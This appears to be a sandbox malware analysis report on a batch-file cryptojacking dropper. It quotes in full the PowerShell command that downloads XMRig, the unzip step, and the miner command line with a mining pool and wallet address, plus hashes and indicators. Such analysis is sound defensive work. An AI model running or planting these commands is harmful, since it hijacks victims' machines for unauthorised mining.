Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Resubmissions
Analysis
-
max time kernel
1799s -
max time network
1791s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
24-01-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy (14).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe xmrig behavioral5/memory/1140-118-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-121-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-122-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-123-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-126-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-127-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-128-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-129-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-130-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-131-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-132-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-133-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-134-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-135-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-136-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-137-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-138-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-139-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-140-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-141-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-142-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-143-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-144-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-145-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-146-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-147-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-148-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-149-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-150-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-151-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-152-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-153-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-154-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-155-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-156-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-157-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-158-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-159-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-160-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-161-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-162-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-163-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-164-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-165-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-166-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-167-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-168-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-169-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-170-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-171-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-172-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-173-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-174-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-175-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-176-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-177-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-178-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-179-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-180-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-181-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-182-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig behavioral5/memory/1140-183-0x00007FF767300000-0x00007FF767E03000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4980 powershell.exe 7 4980 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
xmrig.exepid process 1140 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 640 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exexmrig.exedescription pid process Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeLockMemoryPrivilege 1140 xmrig.exe Token: SeLockMemoryPrivilege 1140 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
xmrig.exepid process 1140 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 540 wrote to memory of 4980 540 cmd.exe powershell.exe PID 540 wrote to memory of 4980 540 cmd.exe powershell.exe PID 540 wrote to memory of 4144 540 cmd.exe powershell.exe PID 540 wrote to memory of 4144 540 cmd.exe powershell.exe PID 540 wrote to memory of 1140 540 cmd.exe xmrig.exe PID 540 wrote to memory of 1140 540 cmd.exe xmrig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (14).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1140
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD542d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
Filesize
1KB
MD55f7b5f0d94fc4237142296ee9276f9cc
SHA150d4939a428a354ce8d56fe8062457c204dfa48e
SHA2569ac43f8b6958354f30ad26d1c9b4a3e30b0778e5d47110b0b2d4c75f77a45c38
SHA5129dc912fc8ef89bff730a26b915ff4f108dc398a6b96470df8fa8afca5462cca89d9adf38af29ab47253b23282b975816ae324a4259a8a4b2b833d3ac2a543cc8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.2MB
MD54b2275e8df65719009314a0a23a45558
SHA195fbef4629f6ace3dba90df63a9825e503e3c7eb
SHA2564b8e7ff95e742973fb9c8c38ac68f6a1e692b05415036e1c92ee201b3b0e6699
SHA512afb324ca3377dc8076d739dde9424ece01b32936b61fd92d5897625f296572637c061068a22a45fbd3e9565be9cb6e35b8f5b9f6c13c5f612443c03d1b04a91f
-
Filesize
7.9MB
MD5e2fe87cc2c7dab8ca6516620dccd1381
SHA1f714ec0448325435103519452610cf7aadf8bbba
SHA256d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA5128455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6